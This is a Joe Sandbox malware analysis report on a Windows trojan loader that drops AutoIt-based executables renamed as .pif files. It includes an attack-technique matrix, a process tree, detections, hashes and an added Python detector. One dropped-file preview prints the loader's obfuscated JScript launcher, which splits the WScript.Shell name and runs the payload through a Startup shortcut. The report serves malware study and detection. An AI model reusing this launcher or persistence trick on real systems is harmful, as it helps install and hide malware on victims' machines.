Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 17 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 11 Masquerading | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 4 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1502253 | Sample: C3KzPHU3UG.exe | Start date: 31/08/2024 | Architecture: WINDOWS | Score: 80

Start
  DNS: XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF
  Signatures: Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; Sigma detected: Drops script at startup location; 2 other signatures
  C3KzPHU3UG.exe 16 started
    cmd.exe 2 started
      dropped: C:\Users\user\AppData\Local\...\Designing.pif, PE32
      signature: Drops PE files with a suspicious file extension
      Designing.pif 4 started
        dropped: C:\Users\user\AppData\Local\...choSync.pif, PE32
        dropped: C:\Users\user\AppData\Local\...choSync.js, ASCII
        signature: Drops PE files with a suspicious file extension
        cmd.exe 2 started
          dropped: C:\Users\user\AppData\...choSync.url, MS
          conhost.exe started
      cmd.exe 2 started
      conhost.exe started
      7 other processes
  wscript.exe 1 started
    signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    EchoSync.pif started

Antivirus detection, submitted file

Source | Detection | Scanner | Label
C3KzPHU3UG.exe | 33% | ReversingLabs | Win32.Trojan.Sonbokli
C3KzPHU3UG.exe | 36% | Virustotal |

Antivirus detection, dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | 0% | ReversingLabs |
C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | 4% | Virustotal |
C:\Users\user\AppData\Local\Temp\585723\Designing.pif | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\585723\Designing.pif | 4% | Virustotal |
No Antivirus matches
No Antivirus matches
Antivirus detection, URLs

Source | Detection | Scanner | Label
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Virustotal |
https://www.autoitscript.com/autoit3/ | 0% | Virustotal |
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF | unknown | unknown | false | | unknown

URLs

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | C3KzPHU3UG.exe, 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685729671.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000002.2896500055.0000000000759000.00000002.00000001.01000000.00000008.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | C3KzPHU3UG.exe | false | URL Reputation: safe | unknown
https://www.autoitscript.com/autoit3/ | Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown

No contacted IP infos
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1502253
Start date and time: 2024-08-31 20:26:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: C3KzPHU3UG.exe (renamed because the original name is a hash value)
Original Sample Name: b1202e7766f87458e7bbee5a2b2103ca.exe
Detection: MAL
Classification: mal80.expl.evad.winEXE@28/15@2/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 87
  • Number of non-executed functions: 310
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information
  • Report size exceeded maximum capacity and may have missing disassembly code
  • Report size getting too big, too many NtOpenKeyEx calls found
  • Report size getting too big, too many NtQueryValueKey calls found
  • Report size getting too big, too many NtSetInformationFile calls found

Time | Type | Description
14:26:54 | API Interceptor | 1x Sleep call for process: C3KzPHU3UG.exe modified
14:26:58 | API Interceptor | 3577x Sleep call for process: Designing.pif modified
14:27:11 | API Interceptor | 2868x Sleep call for process: EchoSync.pif modified
19:26:59 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url
Matches against other analyses (dropped files seen in earlier Joe Sandbox samples)

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | CMmZKp0581.exe | malicious | RedLine
 | X6vWBAXOKt.exe | malicious | RHADAMANTHYS
 | D6irmhLxUJ.exe | malicious | RHADAMANTHYS
 | oOpsx2SCjE.exe | malicious | RHADAMANTHYS
 | X6vWBAXOKt.exe | malicious | RHADAMANTHYS
 | 5qckfVuvzX.exe | malicious | RHADAMANTHYS
 | D6irmhLxUJ.exe | malicious | RHADAMANTHYS
 | oOpsx2SCjE.exe | malicious | RHADAMANTHYS
 | Setup.exe | malicious | Unknown
 | Setup.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\585723\Designing.pif | CMmZKp0581.exe | malicious | RedLine
 | X6vWBAXOKt.exe | malicious | RHADAMANTHYS
 | D6irmhLxUJ.exe | malicious | RHADAMANTHYS
 | oOpsx2SCjE.exe | malicious | RHADAMANTHYS
 | X6vWBAXOKt.exe | malicious | RHADAMANTHYS
 | 5qckfVuvzX.exe | malicious | RHADAMANTHYS
 | D6irmhLxUJ.exe | malicious | RHADAMANTHYS
 | oOpsx2SCjE.exe | malicious | RHADAMANTHYS
 | Setup.exe | malicious | Unknown
 | Setup.exe | malicious | Unknown
Dropped files

Process: C:\Users\user\AppData\Local\Temp\585723\Designing.pif
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 182
Entropy (8bit): 4.695001090663988
Encrypted: false
SSDEEP: 3:RiMIpGXJO9obdPHo55wWAX+Ro6p4EkD52cLmjN+MD5GPGh685uWAX+Ro6p4EkD5P:RiJuOybJHonwWDKaJkDBLqzDKk68wWDK
MD5: 6B4F013441D30E5750372B985750E273
SHA1: 7E1D1DBDA20DF3C8AB9E032201D71C8593FFE665
SHA-256: A6EE10D2E9A5613A93D6775F8BE8801BADCF87143794B6158A9514325B84D6D0
SHA-512: AFB05492AE43610FB9D10BF163ED263ECF0FB0D1BC872ECFC88ED5BF588FD6D2548F7D69A3C99BBBE86CE27D116A04916BF381EE1A14D7A15228B35EAB598A2B
Malicious: true
Preview: new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\EchoSync.pif\" \"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\p\"")
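The 182-byte ASCII file previewed above is consistent with the script that the Startup .url written by Designing.pif (the two echo commands in the process list) points at: it assembles the WScript.Shell ProgID from two string literals, "Wscript.Sh" + "ell", so that a naive grep for WScript.Shell misses it, then calls Exec() on EchoSync.pif with the p file as its argument. The Python below is an added example for this page, not code from the report, from Joe Sandbox or from the malware: it parses the .url as the INI file it is, folds the concatenated string literals in the script back together before matching, and recovers the launched paths. Both inputs are reconstructed from the report text; the extension list and the rule wording are the editor's.

```python
import re
import configparser

QUOTED = r'"((?:[^"\\]|\\.)*)"'                     # one JS double-quoted string literal
CONCAT = re.compile(QUOTED + r"\s*\+\s*" + QUOTED)  # "abc" + "def"
# Extensions that should never sit behind URL= in a Startup shortcut (editor's list).
LOCAL_SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".bat", ".cmd", ".ps1", ".pif", ".scr"}

# Reconstructed from the two echo commands Designing.pif ran (cmd wrote the paths lower-cased).
ECHOSYNC_URL = "[internetshortcut]\n" + r'url="c:\users\user\appdata\local\synctech innovations\echosync.js"' + "\n"

# The dropped 182-byte script exactly as shown in the file preview.
ECHOSYNC_JS = r'''new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\EchoSync.pif\" \"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\p\"")'''


def parse_internet_shortcut(text):
    """Return the URL= value of an .url file (INI syntax), or None. Section and key
    are matched case-insensitively because the loader wrote a lower-cased header."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut" and cp.has_option(section, "url"):
            return cp.get(section, "url").strip().strip('"')
    return None


def startup_target_reason(target):
    """A Startup-folder .url normally carries an http(s) URL; a local script or a
    renamed PE behind URL= is the persistence tell."""
    t = target.lower()
    if t.startswith(("http://", "https://")):
        return None
    base = t.rsplit("\\", 1)[-1]
    ext = base[base.rfind("."):] if "." in base else ""
    if ext in LOCAL_SCRIPT_EXTS:
        return f"Startup .url points at local {ext} file"
    return "Startup .url points at a non-http target"


def fold_string_concat(js):
    """Collapse "Wscript.Sh" + "ell" into "Wscript.Shell", repeating until stable so
    longer chains ("a" + "b" + "c") fold too; ProgID matching then sees whole tokens."""
    prev = None
    while prev != js:
        prev, js = js, CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def activex_progids(js):
    """ProgIDs passed to new ActiveXObject(...) after string folding."""
    return re.findall(r"new\s+ActiveXObject\s*\(\s*" + QUOTED, fold_string_concat(js), re.I)


def launched_paths(js):
    """Quoted paths inside the first argument of .Exec(...) / .Run(...), JS-unescaped."""
    paths = []
    for arg in re.findall(r"\.(?:Exec|Run)\s*\(\s*" + QUOTED, fold_string_concat(js)):
        cmd = re.sub(r"\\(.)", r"\1", arg)          # undo JS escapes: \\ -> \ and \" -> "
        paths.extend(re.findall(r'"([^"]+)"', cmd) or [cmd])
    return paths


def assess(url_text, js_text):
    """Tie the two artifacts together: what the shortcut launches and what that script does."""
    target = parse_internet_shortcut(url_text)
    reasons = []
    if target:
        reason = startup_target_reason(target)
        if reason:
            reasons.append(reason)
    progids = [p.lower() for p in activex_progids(js_text)]
    if "wscript.shell" in progids:
        note = "" if "wscript.shell" in js_text.lower() else " (ProgID split across string literals)"
        reasons.append("WScript.Shell instantiated" + note)
    paths = launched_paths(js_text)
    if paths and paths[0].lower().endswith((".pif", ".scr", ".com")):
        reasons.append("script launches a renamed PE: " + paths[0])
    return {"target": target, "progids": progids, "paths": paths, "reasons": reasons}


if __name__ == "__main__":
    for reason in assess(ECHOSYNC_URL, ECHOSYNC_JS)["reasons"]:
        print(reason)
```

The folding step is the part worth keeping: any string-literal match on WSH scripts (for ProgIDs, for paths, for URLs) should run on the folded text, otherwise a two-character split like the one in this sample defeats it. Folding does not cover concatenation through variables or String.fromCharCode, so treat a match as a positive signal and its absence as no signal.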
                                            Process:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):893608
                                            Entropy (8bit):6.620131693023677
                                            Encrypted:false
                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                            Joe Sandbox View:
                                            • Filename: CMmZKp0581.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: 5qckfVuvzX.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):351185
                                            Entropy (8bit):7.999474842291292
                                            Encrypted:true
                                            SSDEEP:6144:T3oNaSJ5VjwqY331C01qYaeFZ5OtOFeviLd/+UYdX6gySidb8Yf1EjtyW:Spj/IFFMY5FLOvviN+UyX6gSd4kqr
                                            MD5:CD47FFFE33ADBB01AC7D60B0C4E1F202
                                            SHA1:863EE2A1820CD21319E1689A181A5545005200D0
                                            SHA-256:EFFBBB10725528FB5CFA0C6727523DD07DF47F7955D85C509C3F0F6FE8EF9193
                                            SHA-512:78E8242F7196ACF211A353B744BC363BF71A9DF5E350952ADCE270222CF52C6130B18F51A300AB9FF7B9ECCE1FEB33AF6BC6B88751965A146CFF1F94E68F5B92
                                            Malicious:false
                                            Preview:..?.Y@..L.m^..........=,.. .......-j..XJ......m..EN.i?...e.kz.....o..|....'..n.5 [StK..g-..K.z^A...5z....[.}...5Z=.'P<.....LvA.....V.........PY.!.Z.R;s..?i.l.....-z.x.h.Gfz.....!c&43..GFBLU.....5.#.....!......m.Jq....3.5......I..>..ZB...NB...=L...[..^r".,L-......E.sw....{z.,O.\.BAJP..H8d.5.6...R...V..S..........w..D,.m;...M...j...._....P$..k.6.x...Z(.|'.]..w..r@.?.!.b...a.g.w..../..67vH....*..KV.oV....s...o....l...SU..D...<....]Z.....\z..h....H\.l...{..U.. u.,.gb..s%..>..K".$.D.D.3...o~..Q...l.lcHG.=.=....c..y*j./...xV..1G..k$...J....n.e.!.0]...[.].?.QP.j9+O>;.|.d.94j9P.5.5...%..64l.._.!.x:u..}O.M&.$@......P.ju....E...f..?R..Mk.l....+.l.f.'4.m........c)K_..m........V......4.T...V.]..3.A..mo.7....Q1@.g..G.z7..Q)B.C..."...u)F.K...q].1'......5.FYBV4../d..._.../.Q...+...7'.:..}Y...Z..B.i.t)A..bb.^<z-.:-.))".6...^:M....&...m..'P..h.;.-.Y..F.=#...(.....kY.O.H%Q.:..SU#...n..{.j.p._..K.|.S.'....~K.&:0P...#'...D)._....l..AXA.]../=C.?v...(aa.c..H..-.c..N
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):893608
                                            Entropy (8bit):6.620131693023677
                                            Encrypted:false
                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                            Joe Sandbox View:
                                            • Filename: CMmZKp0581.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: 5qckfVuvzX.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):351185
                                            Entropy (8bit):7.999474842291292
                                            Encrypted:true
                                            SSDEEP:6144:T3oNaSJ5VjwqY331C01qYaeFZ5OtOFeviLd/+UYdX6gySidb8Yf1EjtyW:Spj/IFFMY5FLOvviN+UyX6gSd4kqr
                                            MD5:CD47FFFE33ADBB01AC7D60B0C4E1F202
                                            SHA1:863EE2A1820CD21319E1689A181A5545005200D0
                                            SHA-256:EFFBBB10725528FB5CFA0C6727523DD07DF47F7955D85C509C3F0F6FE8EF9193
                                            SHA-512:78E8242F7196ACF211A353B744BC363BF71A9DF5E350952ADCE270222CF52C6130B18F51A300AB9FF7B9ECCE1FEB33AF6BC6B88751965A146CFF1F94E68F5B92
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):606
                                            Entropy (8bit):4.171581490687077
                                            Encrypted:false
                                            SSDEEP:12:W4GGyGSGCbTQxbs/0pQHPZdZELq6h1p5zGbWCBl9d:W4/yGSnPQxqtP5ELqCB8WCBl9d
                                            MD5:E9856F2B8DECBEBABC221C0F2E496F20
                                            SHA1:8621A7F74C4D5988746232F20B2496AB2FD8DE12
                                            SHA-256:4C30BC37C41224ADB022A6D8252E46ADC61C934D570A84E069C3D34E71D0E4AB
                                            SHA-512:52AE75B5714E4F6EBB60B9432E762505BF078561155BE7E39C05807A6896A2634712BEE14D4742CE946DC87EB1FB2316F28652E3AE62B8A19A5DCE74317BD788
                                            Malicious:false
                                            Preview:TranscriptHousesConstitutesMedicaid..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46033
                                            Entropy (8bit):7.996252767487294
                                            Encrypted:true
                                            SSDEEP:768:GXJqyPaJl7BrNgnJB+B2zYRfTZU21YmpDS6M+NYZ4CMpXml+OYGrOIXPn5tW:WJqyPa/czYRfT6SYmlbMiC46+x/ynW
                                            MD5:8C983FB24AFD21BFAB17F53EEFB84B13
                                            SHA1:C2790306C98132FAD4BDA0B2B38DBA9F6AEB4E05
                                            SHA-256:BBA6CEB56CFF0214991F071878652EF1EA5FA3CD3BD733F20FDCD6C8BDDA519F
                                            SHA-512:96139ABBE1DD7BD5D5B4281234E00771A3AD42C3E52B770BBAB18BBC1A189CC5EFE6409935EFCAFBD887D091F38DC2BE4783CF9FFEE28B357660ACE850C0D3D6
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):60416
                                            Entropy (8bit):7.997135132810458
                                            Encrypted:true
                                            SSDEEP:1536:dXiFfFSCaLPv58HX8Mw6+9XOYPBOEHTGniLYXq1m:dyJFZaL358HXPO9XOFn4Mq8
                                            MD5:9B1F4737875CC11CF41F8B97F3D52D37
                                            SHA1:06459D099C348CCC60CF8C321EF4D6EAA65CBB57
                                            SHA-256:44594B5CC7AB3F9C4F46A0162519A20721E47427566A3E037830F9D6F694BBB3
                                            SHA-512:AD39AE2CC867948003A496F1517F43E41BD1E5B91FD594D06346EE8864BBDAE829752C31F9325BB66285D2FDBFD45899E403FABDAA065D8A5DF3543ACFC6B3A8
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):79872
                                            Entropy (8bit):7.997754404922945
                                            Encrypted:true
                                            SSDEEP:1536:bQ5mdVHiL1j94oS/jG1wfflrvsmC2gg+gQPuUKas/YzLprM:8lL1i/jd6g/+gMuzYzLFM
                                            MD5:BE0479B41AD621501A4462A24C139527
                                            SHA1:4602C49C0120FE022B4E7FC598EC7265831FF12A
                                            SHA-256:4DB79D82F4515FD5EB29DAC3882C3B86591C372C855EF1B262A28D982F7D49B3
                                            SHA-512:51973BD0EE5FEDF3385732201B78B6C6C5C8EC28E180B099E6C3F3E0D87F7A0AD107A95AAC703ACF142B57A21FB71E5CE04E02402878F709AB12A08B7A84CA59
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):99328
                                            Entropy (8bit):7.99815527916542
                                            Encrypted:true
                                            SSDEEP:3072:T3oNaSrVMEzHIZiVk4wqSn403JlZYslWr01OvVgbFk:T3oNaSJ5VjwqY331C01qYk
                                            MD5:0665952A0B9794FC246C678C5707BAC7
                                            SHA1:B0F0E072077C6630A9EDC7F5E8296D5A43E9F215
                                            SHA-256:1CE23E136058FD63B56953D34E3F15D7B1DCF94BF1B2F176E1C94729D1EF89B4
                                            SHA-512:5B34561DBD6704F7A6FBD3F3C8AD2971F5267A88901B6B3FA92E2BA446C716BA22CDCDCB2D251131AFACA6A15A55FEF502F3FA1AC911DA08666395520B7B7D6C
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:ASCII text, with very long lines (969), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):21310
                                            Entropy (8bit):5.054321919803729
                                            Encrypted:false
                                            SSDEEP:384:NtNabO7eIoldlxoKOZ31BULl5t3r4Fbo7YJzZlLdmZtQ/l:HZncdWZ3zUjrcJzRmZtQ/l
                                            MD5:7B1E80618BDCFA76B8F092931A2503B5
                                            SHA1:6D6470D55AEB276C7D3E9D9E0A3AA8B908B5142B
                                            SHA-256:0D99C37E647CBC1487038C853E374F0962AFF625D3E502C2B92B5A6A7D74645A
                                            SHA-512:7EEC6C65377CB96A43ACB0877D4D5299F9C9A9F877D5224CF047DF1DCB96FD7EBC081F4A775AB533D1AC53D007DF1CEEF82B2031446654A8D7827BFE155114DE
                                            Malicious:false
                                            Preview:Set Pod=t..UYImAppliance ..JjDon Vbulletin ..vasMarker Platform Warranty Bunny ..ekDAccess Na Boulder Halloween Lowest Chose Nomination Trusted Disco ..kzISAcre Majority Gap ..CAkConsiderations Bikes Boost ..Set Accepting=x..nWbWAntibody ..ERFFilter Moments ..CuSympathy Showtimes Regional Bridal Tent Pictures Serving Advertiser Inherited ..fVdvFlesh Croatia ..UObFPackages Hostel Printing Rising Establishing Continuously United Are ..tujpNaughty Morris Disturbed Parameter Tomato ..Set Nm=u..IBVisitors Xi ..zIsDisclose Yu Boards Practices Connect ..mQALSorry Comfortable Connecticut Wa Speed ..kGuAcute Match Failure Returning Christopher ..alEBibliography Regard Of Waterproof Confused Headphones Told ..zitMarina ..Set Riverside=N..ZZoClock Annually Cottage Warriors Determines Indonesian Ross ..wdiFAsbestos Incident Bidder Mf Cursor Rosa Hopefully Raised Songs ..YbAccessibility Milton Treating Sets Nam Following Arrest Stranger Land ..BHRemark Parameter Wiley Fix Approach Address Ka ..mdSe
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:ASCII text, with very long lines (969), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):21310
                                            Entropy (8bit):5.054321919803729
                                            Encrypted:false
                                            SSDEEP:384:NtNabO7eIoldlxoKOZ31BULl5t3r4Fbo7YJzZlLdmZtQ/l:HZncdWZ3zUjrcJzRmZtQ/l
                                            MD5:7B1E80618BDCFA76B8F092931A2503B5
                                            SHA1:6D6470D55AEB276C7D3E9D9E0A3AA8B908B5142B
                                            SHA-256:0D99C37E647CBC1487038C853E374F0962AFF625D3E502C2B92B5A6A7D74645A
                                            SHA-512:7EEC6C65377CB96A43ACB0877D4D5299F9C9A9F877D5224CF047DF1DCB96FD7EBC081F4A775AB533D1AC53D007DF1CEEF82B2031446654A8D7827BFE155114DE
                                            Malicious:false
                                            Preview:Set Pod=t..UYImAppliance ..JjDon Vbulletin ..vasMarker Platform Warranty Bunny ..ekDAccess Na Boulder Halloween Lowest Chose Nomination Trusted Disco ..kzISAcre Majority Gap ..CAkConsiderations Bikes Boost ..Set Accepting=x..nWbWAntibody ..ERFFilter Moments ..CuSympathy Showtimes Regional Bridal Tent Pictures Serving Advertiser Inherited ..fVdvFlesh Croatia ..UObFPackages Hostel Printing Rising Establishing Continuously United Are ..tujpNaughty Morris Disturbed Parameter Tomato ..Set Nm=u..IBVisitors Xi ..zIsDisclose Yu Boards Practices Connect ..mQALSorry Comfortable Connecticut Wa Speed ..kGuAcute Match Failure Returning Christopher ..alEBibliography Regard Of Waterproof Confused Headphones Told ..zitMarina ..Set Riverside=N..ZZoClock Annually Cottage Warriors Determines Indonesian Ross ..wdiFAsbestos Incident Bidder Mf Cursor Rosa Hopefully Raised Songs ..YbAccessibility Milton Treating Sets Nam Following Arrest Stranger Land ..BHRemark Parameter Wiley Fix Approach Address Ka ..mdSe
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893039
                                            Entropy (8bit):6.620862708952553
                                            Encrypted:false
                                            SSDEEP:12288:EpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:ET3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:B26146F2B662FFA5919284DD4831C647
                                            SHA1:CCCDC4E7D42B895D8B37291370B257B4B2D61EC3
                                            SHA-256:88DA0095076FE872A9E8E2E957BCB2275B43759B8DEC62E1FB772643BD6F4863
                                            SHA-512:4CC97ECC70D4A58AB8C22B6BC4D46BB672526536D22BB7713FCE300ADD23DD9A83FD7D80DC249F124E80B4B5818AFD99293DC18E4E26BF94A11BD42D0FE4099B
                                            Malicious:false
